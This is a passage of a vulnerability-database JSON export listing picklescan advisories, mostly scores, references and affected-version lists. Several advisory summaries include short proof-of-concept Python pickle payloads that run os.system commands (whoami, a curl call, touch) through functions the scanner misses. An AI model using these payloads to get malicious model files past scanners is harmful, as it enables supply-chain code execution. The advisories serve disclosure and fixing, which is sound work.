}, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.28" } ], "aliases": [ "GHSA-86cj-95qr-2p4f" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cj2u-dmaj-wbd4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212463?format=api", "vulnerability_id": "VCID-cq25-8mmm-3yfg", "summary": "Picklescan is vulnerable to RCE via missing detection when calling built-in python _operator.attrgetter", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/f2dea43e0c838e09ace1e62994143254b51de927", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/f2dea43e0c838e09ace1e62994143254b51de927" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.34", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.34" }, { "reference_url": "https://github.com/advisories/GHSA-46h3-79wf-xr6c", "reference_id": "GHSA-46h3-79wf-xr6c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-46h3-79wf-xr6c" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-46h3-79wf-xr6c", "reference_id": "GHSA-46h3-79wf-xr6c", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-46h3-79wf-xr6c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36386?format=api", "purl": "pkg:pypi/picklescan@0.0.34", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.34" } ], "aliases": [ "GHSA-46h3-79wf-xr6c" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cq25-8mmm-3yfg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360671?format=api", "vulnerability_id": "VCID-cupp-7ca3-wfa6", "summary": "Picklescan missing detection when calling pytorch function torch.utils.data.datapipes.utils.decoder.basichandlers\n### Summary\n\nUsing torch.utils.data.datapipes.utils.decoder.basichandlers function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch.utils.data.datapipes.utils.decoder.basichandlers function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport torch.utils.data.datapipes.utils.decoder as decoder\n\nclass EvilTorchUtilsDataDatapipesDecoder:\n def __reduce__(self):\n extension = 'pickle'\n class RCE:\n def __reduce__(self):\n return os.system, ('whoami',)\n data = pickle.dumps(RCE())\n return decoder.basichandlers, (extension, data)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/47" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-h3qp-7fh3-f8h4", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-h3qp-7fh3-f8h4" }, { "reference_url": "https://github.com/advisories/GHSA-h3qp-7fh3-f8h4", "reference_id": "GHSA-h3qp-7fh3-f8h4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-h3qp-7fh3-f8h4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89080?format=api", "purl": "pkg:pypi/picklescan@0.0.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.28" } ], "aliases": [ "GHSA-h3qp-7fh3-f8h4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-cupp-7ca3-wfa6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212708?format=api", "vulnerability_id": "VCID-czzc-g8zx-1kbq", "summary": "PickleScan has multiple stdlib modules with direct RCE not in blocklist", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/advisories/GHSA-g38g-8gr9-h9xp", "reference_id": "GHSA-g38g-8gr9-h9xp", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g38g-8gr9-h9xp" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g38g-8gr9-h9xp", "reference_id": "GHSA-g38g-8gr9-h9xp", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g38g-8gr9-h9xp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/40119?format=api", "purl": "pkg:pypi/picklescan@1.0.4", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@1.0.4" } ], "aliases": [ "GHSA-g38g-8gr9-h9xp" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-czzc-g8zx-1kbq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360663?format=api", "vulnerability_id": "VCID-d1k5-6npz-2kcg", "summary": "Picklescan is missing detection when calling built-in python cProfile.runctx\n### Summary\n\nUsing cProfile.runctx function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to cProfile.runctx function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport cProfile\n\nclass EvilCProfileRunctx:\n def __reduce__(self):\n # cProfile.runctx(cmd, globals, locals) -> exec(cmd, ...)\n return cProfile.runctx, (\"__import__('os').system('whoami')\", None, None)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9w88-8rmg-7g2p", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9w88-8rmg-7g2p" }, { "reference_url": "https://github.com/advisories/GHSA-9w88-8rmg-7g2p", "reference_id": "GHSA-9w88-8rmg-7g2p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9w88-8rmg-7g2p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-9w88-8rmg-7g2p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d1k5-6npz-2kcg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360488?format=api", "vulnerability_id": "VCID-d4vv-a8kx-5kdc", "summary": "Picklescan failed to detect to some unsafe global function in Numpy library\n### Summary\nAn unsafe deserialization vulnerability in Python’s pickle module allows an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization. This can be exploited by import some built-in function in Numpy library that indrectly call some dangerous function like exec() to execute some python code as a parameter, which the attacker can import dangerous library inside like os library and execute arbitrary OS commands.\n### Details\nPickle’s deserialization process is known to allow execution of function via **reduce** method. While Picklescan is meant to detect such exploits, this attack evades detection by calling function in Numpy library that call dangerous function like exec(). And since Numpy library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.\n\nThe attack payload executes in the following steps:\n- First, the attacker craft the payload by import **runstring** function in **numpy.testing._private.utils**\n- Then, inside **reduce** method, the attacker import dangerous libarary like os and calling os.system() to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.\n- Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n```\nimport pickle\nimport torch\nimport pickle\nfrom picklescan.scanner import scan_file_path\nclass Payload:\n def __reduce__(self):\n from numpy.testing._private.utils import runstring\n return runstring, (\"import os; os.system('curl https://example.com')\",{})\n \ndef create_payload():\n with open('payload.pickle', 'wb') as f:\n pickle.dump(Payload(), f)\n\ndef load_payload():\n result = scan_file_path('payload.pickle')\n if result.infected_files != 0 or result.scan_err:\n print('File is infected')\n else:\n print('File is clean')\n with open('payload.pickle', 'rb') as f:\n pickle.load(f)\n\ncreate_payload() \nload_payload()\n\n```\n\n### Impact\nSeverity: High\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. For example, Invoke-AI repository (https://github.com/invoke-ai/InvokeAI)\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Recommended Fixes:\n\nI suggest adding Numpy library to the unsafe globals blacklist.", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-fj43-3qmq-673f", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-fj43-3qmq-673f" }, { "reference_url": "https://github.com/advisories/GHSA-fj43-3qmq-673f", "reference_id": "GHSA-fj43-3qmq-673f", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-fj43-3qmq-673f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87471?format=api", "purl": "pkg:pypi/picklescan@0.0.25", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.25" } ], "aliases": [ "GHSA-fj43-3qmq-673f" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d4vv-a8kx-5kdc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360637?format=api", "vulnerability_id": "VCID-dsy5-2z6e-jqds", "summary": "Picklescan missing detection when calling pytorch function torch.utils.collect_env.run\n### Summary\n\nUsing torch.utils.collect_env.run function, which is a pytorch library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to torch.utils.collect_env.run function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nimport torch.utils.collect_env as collect_env\n\nclass EvilTorchUtilsCollectEnvRun:\n def __reduce__(self):\n command = 'touch /tmp/collect_env_run_success'\n return collect_env.run, (command,)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/7f994d62084fe43f1cffdef2f9bae6923344ef53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/47", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/47" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.28" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f745-w6jp-hpxx", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-f745-w6jp-hpxx" }, { "reference_url": "https://github.com/advisories/GHSA-f745-w6jp-hpxx", "reference_id": "GHSA-f745-w6jp-hpxx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f745-w6jp-hpxx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89080?format=api", "purl": "pkg:pypi/picklescan@0.0.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": 